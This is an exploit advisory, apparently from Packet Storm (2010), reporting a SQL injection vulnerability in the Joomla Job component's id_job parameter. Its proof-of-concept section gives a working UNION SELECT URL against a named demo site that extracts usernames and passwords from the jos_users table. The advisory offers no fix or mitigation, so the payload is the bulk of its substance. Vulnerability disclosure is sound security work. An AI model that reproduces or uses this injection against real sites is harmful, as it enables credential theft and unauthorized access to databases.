Joomla Job SQL Injection

2010-02-02T00:00:00
ID PACKETSTORM:85822
Type packetstorm
Reporter bhunt3r
Modified 2010-02-02T00:00:00

Description

                                        
                                            `[~]>> ...[BEGIN ADVISORY]...  
  
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!  
  
[~]>> TITLE: Joomla (Job Component) SQL Injection Vulnerability  
[~]>> LANGUAGE: PHP  
[~]>> DORK: N/A  
[~]>> RESEARCHER: B-HUNT3|2  
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com  
[~]>> TYPE: N/A  
[~]>> PRICE: N/A  
[~]>> TESTED ON: Demo Site  
  
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!  
  
[~]>> DESCRIPTION: Input var id_job is vulnerable to SQL Code Injection  
[~]>> AFFECTED VERSIONS: N/A  
[~]>> RISK: Medium/High  
[~]>> IMPACT: Execute Arbitrary SQL queries  
  
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!  
  
[~]>> PROOF OF CONCEPT:  
  
[~]>> http://job.joomhouse.com/index.php?option=com_job&controller=listcategory&task=viewJob&id_job=[SQL]  
  
[~]>> http://job.joomhouse.com/index.php?option=com_job&controller=listcategory&task=viewJob&id_job=-1+UNION+ALL+SELECT+1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+FROM+jos_users--  
  
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!  
  
[~]>> ...[END ADVISORY]...  
`